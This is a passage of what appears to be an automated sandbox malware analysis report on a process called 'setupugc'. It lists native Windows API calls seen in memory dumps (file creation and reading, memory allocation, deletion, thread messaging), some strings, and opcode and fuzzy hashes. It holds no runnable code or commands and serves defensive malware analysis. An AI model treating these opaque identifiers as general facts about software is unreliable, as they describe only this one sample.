                • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 00D090CE
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                • Instruction ID: 56c20cca11b92454124b06ba841fc3dd41e3e8f3a142d859ac00d859f05c2427
                • Opcode Fuzzy Hash: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                • Instruction Fuzzy Hash: 8E31C5B5A00648AFCB14DF99D881EEFB7F9EF88304F104219F919A7384D770A951CBA1
                APIs
                • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 00D09226
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                • Instruction ID: 24f574e3ce0e5e656106284997cb1766ef8fcc904170a302efd35e75bb990bf6
                • Opcode Fuzzy Hash: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                • Instruction Fuzzy Hash: A03107B5A00248ABDB14DF98D841EEFB7F9EF88304F108219FD09A7384D774A911CBA1
                APIs
                • NtAllocateVirtualMemory.NTDLL(00CF1CBB,?,00D07EEF,00000000,4A9873AC,00003000,?,?,?,?,?,00D07EEF,00CF1CBB), ref: 00D094F8
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                • Instruction ID: d085970dff47c3165eb5ec05329accb79df958280cd75401d2ffb97d5fa202c3
                • Opcode Fuzzy Hash: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                • Instruction Fuzzy Hash: CB2106B5A00249AFDB14DF98DC41FAFB7B9EF88304F104519FD08AB285D774AA118BA1
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                • Instruction ID: 46998a45326837bb5cdf75b2bcdfee60f5dc94e505f75d6fa4488f68caaa35ba
                • Opcode Fuzzy Hash: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                • Instruction Fuzzy Hash: 18118C71A007086BD721EA689C02FAFB3ACEB84314F004109F908A7281EB716A018BB1
                APIs
                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00D09304
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction ID: 7c46831c7235ce4ab049bf847dbfd125a35d0dec64014a62898ebdc54a481ac0
                • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction Fuzzy Hash: 6EE046362106147BD220BA6ACC01F9B77ACEBC5714F008419FA18A7281C672BA1087B4
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 817cb8341f6842370f07dfa1432b8248e35bfc8636d9385b23ecee29a0bb2674
                • Instruction ID: d8043329acf0c472dfce48373bb2c545ef9232d576e73035c2714355ba86c85f
                • Opcode Fuzzy Hash: 817cb8341f6842370f07dfa1432b8248e35bfc8636d9385b23ecee29a0bb2674
                • Instruction Fuzzy Hash: D890023160584452D140B5584C84586401997E0301B55C011E0425754D8B548A965B61
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 04806780ce68feadf8e567ef97941be7bb340165d9e7fd1a3458644b2a2d5a7c
                • Instruction ID: 7676d6ada120bb0f1da0a082b87a6868eb323d2aafabe47166347d97ee41d34f
                • Opcode Fuzzy Hash: 04806780ce68feadf8e567ef97941be7bb340165d9e7fd1a3458644b2a2d5a7c
                • Instruction Fuzzy Hash: 4D900261601544828140B5584C04446601997E1301395C115A0555760D875889959B69
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0889c38f57cdca93f0c6e83b235224ca9d8ba7c38351342421ae79908a7e0f26
                • Instruction ID: 0d5fa746a186833e1a2480ab917f9d148d28c114fbf6a6d0f952f595da6583da
                • Opcode Fuzzy Hash: 0889c38f57cdca93f0c6e83b235224ca9d8ba7c38351342421ae79908a7e0f26
                • Instruction Fuzzy Hash: 92900261202444438105B5584814656401E87E0201B55C021E1015790EC66589D16A25
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b89266965f5d0ebc9b0b11f70d7601aae972ab0c064d97ac434945fc069f5eff
                • Instruction ID: 8753d50cd954f3e9b15705af84bd54c028380360970b7f699eb87e76c5e0875d
                • Opcode Fuzzy Hash: b89266965f5d0ebc9b0b11f70d7601aae972ab0c064d97ac434945fc069f5eff
                • Instruction Fuzzy Hash: 2E90023120548C82D140B5584804A86002987D0305F55C011A0065794E97658E95BF61
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b3f63ef0a37da2ecdda6508081d9b42f529e3ba4ce9dfde4d3af6c9b0c4612b9
                • Instruction ID: a143829bb6b59884d006a5b1c0c4119eb701d84ece4d6b287f2c14d27da94ec6
                • Opcode Fuzzy Hash: b3f63ef0a37da2ecdda6508081d9b42f529e3ba4ce9dfde4d3af6c9b0c4612b9
                • Instruction Fuzzy Hash: 0790023120144C42D180B558480468A001987D1301F95C015A0026754ECB558B997FA1
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b1847db42be8a150f63c809b7c238aa7a1fcf8b11bcd55f239eb7ef15836e4bc
                • Instruction ID: dcc4d287a051ccfdd3b4c4b8c06b4d4002730e2273be42ed74d308ed0e51561f
                • Opcode Fuzzy Hash: b1847db42be8a150f63c809b7c238aa7a1fcf8b11bcd55f239eb7ef15836e4bc
                • Instruction Fuzzy Hash: FF90023160544C42D150B5584814786001987D0301F55C011A0025754E87958B957FA1
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 9464ea59d913654e004001f6f4e87e3e9f31ffad7844216015fe0acddb2d822f
                • Instruction ID: 8dcc9f4220ffbbc7ef590a4171b3c00af909ddce3c54f0384d0f401d54663acc
                • Opcode Fuzzy Hash: 9464ea59d913654e004001f6f4e87e3e9f31ffad7844216015fe0acddb2d822f
                • Instruction Fuzzy Hash: B3900225221444424145F9580A0454B045997D6351395C015F1417790DC76189A55B21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7e30aec4228d24626c4987968fd4e4256ce15de7acf30bb84ae40d30377a9933
                • Instruction ID: b0022bb5b37e0c35efa8b8e51c8ffef0406405f1f4a46d9d28a7867f29ee853c
                • Opcode Fuzzy Hash: 7e30aec4228d24626c4987968fd4e4256ce15de7acf30bb84ae40d30377a9933
                • Instruction Fuzzy Hash: B7900225211444434105F9580B04547005A87D5351355C021F1016750DD76189A15A21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 98ca8c95f95cfc9cbce0f986c6de937c69d5c7f892423747dcd5aae603f95e83
                • Instruction ID: ffcb3f82d4a775c9a2271ac5f5e0c3059a9294da89af3985c622be28fa6e2a5d
                • Opcode Fuzzy Hash: 98ca8c95f95cfc9cbce0f986c6de937c69d5c7f892423747dcd5aae603f95e83
                • Instruction Fuzzy Hash: 0790026134144882D100B5584814B460019C7E1301F55C015E1065754E8759CD926A26
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2a6c2e066adf04c585571cdf4e75907286337179f0681f5e404bc873cb209a2d
                • Instruction ID: c19059a1969165ea831d0149fe7eabb7f2c8be9ce4f1125a03c606453ed947a5
                • Opcode Fuzzy Hash: 2a6c2e066adf04c585571cdf4e75907286337179f0681f5e404bc873cb209a2d
                • Instruction Fuzzy Hash: 60900221211C4482D200B9684C14B47001987D0303F55C115A0155754DCA5589A15E21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: daf3f3dff54ccd463b0604e7b0b1b168f337a16edb736f4859cc11774340798b
                • Instruction ID: 73be91965cc03e2f28ddd69fb17d1e9e194264c18d58b0718f46262c1458235e
                • Opcode Fuzzy Hash: daf3f3dff54ccd463b0604e7b0b1b168f337a16edb736f4859cc11774340798b
                • Instruction Fuzzy Hash: 12900221601444828140B5688C449464019ABE1211755C121A0999750E869989A55F65
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f235d8bc8e0794a4a7be06f29340debc4801d3e1cc30b4b7297359c4cfd980cd
                • Instruction ID: a8e3a7c2db3c9ccb2ba0fc30ab70aaaf3df04a83316d27d1ec5fd9233a95c3bd
                • Opcode Fuzzy Hash: f235d8bc8e0794a4a7be06f29340debc4801d3e1cc30b4b7297359c4cfd980cd
                • Instruction Fuzzy Hash: CC90026120184843D140B9584C04647001987D0302F55C011A2065755F8B698D916A35
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ab356e18533e016f399c4be46eb559231629cab1c4b1b3790a3eef253f2750e5
                • Instruction ID: c87f9ef7edc653fd503c5c3908b62b608feb788c43dadcf9646f1220e89a846b
                • Opcode Fuzzy Hash: ab356e18533e016f399c4be46eb559231629cab1c4b1b3790a3eef253f2750e5
                • Instruction Fuzzy Hash: C190022160144942D101B5584804656001E87D0241F95C022A1025755FCB658AD2AA31
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 719823e28f85cf8f9926821cc51ade453698bc49d8e1a3e874d0e1dfcaf03e7e
                • Instruction ID: 5c51f534ffbfcf52c0e90c857b43bd304863759a5ba4fc685bbcbcfbf3784367
                • Opcode Fuzzy Hash: 719823e28f85cf8f9926821cc51ade453698bc49d8e1a3e874d0e1dfcaf03e7e
                • Instruction Fuzzy Hash: 0490022130144443D140B55858186464019D7E1301F55D011E0415754DDA5589965B22
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8ea404dd2240959de3c1e21f845e8f8eda8f66c8062a77b0a791f46f86f08794
                • Instruction ID: 5ce3722e11dbc42b6e59d8defa48f43f310172074a8cc6c965dd216c302acece
                • Opcode Fuzzy Hash: 8ea404dd2240959de3c1e21f845e8f8eda8f66c8062a77b0a791f46f86f08794
                • Instruction Fuzzy Hash: B390022921344442D180B558580864A001987D1202F95D415A0016758DCA5589A95B21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1dcdd0d8e0911db121daed127e88dfe36b7437bafd36d61daf7652dda7e02d88
                • Instruction ID: 4d913cdeacf038078a32fc0ef61fd2217fcfed07d0a6793c8c5088a89f77fabc
                • Opcode Fuzzy Hash: 1dcdd0d8e0911db121daed127e88dfe36b7437bafd36d61daf7652dda7e02d88
                • Instruction Fuzzy Hash: 7D90023120144853D111B5584904747001D87D0241F95C412A0425758E97968A92AA21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7dcc793e21b852bccd91143764d632bb2881014059cb942fea621e37ffde362b
                • Instruction ID: 31659203ec981f7fe2c5eb27a43e0dc13996504b81b2ca8bd3ce6c890a9067f6
                • Opcode Fuzzy Hash: 7dcc793e21b852bccd91143764d632bb2881014059cb942fea621e37ffde362b
                • Instruction Fuzzy Hash: 5E900221242485929545F5584804547401A97E0241795C012A1415B50D86669996DF21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e5d06b00408b3ce1358e8e965d10eaeca4a46276715114a6126079aecac93af2
                • Instruction ID: 23f63753b65788075746294c400e83de35c0c85fc88632f2d99dd3162a682fa7
                • Opcode Fuzzy Hash: e5d06b00408b3ce1358e8e965d10eaeca4a46276715114a6126079aecac93af2
                • Instruction Fuzzy Hash: E090023120144C82D100B5584804B86001987E0301F55C016A0125754E8755C9917E21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 704fd83c0a4977b248cc6fbb55018fb3c2f69b5855d0a783080e5438ecc27bbd
                • Instruction ID: c5ab639f79e33656ac9a0660d294ab0a42499dd5188e4981d04c737be758c92e
                • Opcode Fuzzy Hash: 704fd83c0a4977b248cc6fbb55018fb3c2f69b5855d0a783080e5438ecc27bbd
                • Instruction Fuzzy Hash: 6B9002312014CC42D110B558880478A001987D0301F59C411A4425758E87D589D17A21
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3d2adb663a713a8113c1f4f23d41fae5700c6bff46f9ef6ea7df651a17137166
                • Instruction ID: 771e841a94f9ad5a940b3522c83dbaf1fca265d8e1854ab66d84386d254d36a0
                • Opcode Fuzzy Hash: 3d2adb663a713a8113c1f4f23d41fae5700c6bff46f9ef6ea7df651a17137166
                • Instruction Fuzzy Hash: 3290023120144842D100B9985808686001987E0301F55D011A5025755FC7A589D16A31
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c6d3de48a824b9060268acf8fdab9c730f76143e2b3956576315bce6aebde71a
                • Instruction ID: 8dee825a8dafc338d3d2d9df318bf426dd8c3b0e969104482905c78317173682
                • Opcode Fuzzy Hash: c6d3de48a824b9060268acf8fdab9c730f76143e2b3956576315bce6aebde71a
                • Instruction Fuzzy Hash: 8F90023160554842D100B5584914746101987D0201F65C411A0425768E87D58A916EA2
                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 53adff3cf791ea703382dbfb0cb83545b886f4558f24970add084f0c41081b72
                • Instruction ID: e69e1244f9d420c189f588913e8298ef61e7945fabe9fb1f7a377f0441a02239
                • Opcode Fuzzy Hash: 53adff3cf791ea703382dbfb0cb83545b886f4558f24970add084f0c41081b72
                • Instruction Fuzzy Hash: 8890022124549542D150B55C48046564019A7E0201F55C021A0815794E869589956B21

                Control-flow Graph (graph rendering not reproduced)
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 3h8t0-08$3h8t0-08$a~V
                • API String ID: 0-2215303234
                • Opcode ID: e6f08f86262b08cc159420529e04d3981d934f491bbd702736c8023988af0b9f
                • Instruction ID: ab26d0a64d06b19875077a9dbff9e4aff8cc80feb21a4f4180cb15ed9ae8b8c8
                • Opcode Fuzzy Hash: e6f08f86262b08cc159420529e04d3981d934f491bbd702736c8023988af0b9f
                • Instruction Fuzzy Hash: A751E13290428D6FCB12CF708CC6AEEBFB9EE42744B18419CE9946B143D6258D06C7E2

                Control-flow Graph (graph rendering not reproduced)
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 00CF0D57
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_ce0000_setupugc.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 155abccc208a26b06edeadb5fcc03e029c8794978c5d0c17ca798ee7bc69e911
                • Instruction ID: 5643e10667136cff7fa80a3e92af308f46086dec1df7cf8470e6fdf14bc16632
